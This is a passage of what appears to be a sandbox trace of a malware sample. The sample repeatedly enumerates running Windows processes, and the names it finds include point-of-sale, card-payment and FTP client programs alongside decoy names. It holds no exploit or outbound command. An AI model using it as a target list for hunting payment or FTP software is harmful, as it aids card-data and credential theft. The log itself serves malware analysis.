lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0292.177] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0292.180] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0292.183] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0292.189] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0292.192] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0292.195] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0292.197] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0292.321] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0292.324] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0292.326] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0292.327] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0292.329] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0292.331] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0292.333] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0292.334] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0292.336] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0292.338] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0292.342] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0292.344] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.346] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.348] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0292.349] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0292.351] CloseHandle (hObject=0x21f8) returned 1 [0292.351] Sleep (dwMilliseconds=0x64) [0292.505] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0292.561] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.563] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.565] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.567] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.568] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.570] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.572] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.576] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.578] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.580] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.581] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.583] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.591] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.593] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.594] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.596] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.598] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.599] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.601] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.603] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.604] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0292.612] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0292.616] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.618] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.620] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0292.624] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0292.626] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0292.628] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0292.629] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.638] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.640] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.641] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0292.643] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0292.645] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0292.646] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0292.648] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0292.649] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0292.653] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0292.655] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0292.657] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0292.659] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0292.660] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0292.662] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0292.663] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0292.665] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0292.669] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0292.671] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0292.673] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0292.675] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0292.676] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0292.678] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0292.680] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0292.681] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0292.783] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0292.785] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0292.787] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0292.789] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0292.791] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0292.796] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0292.798] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, 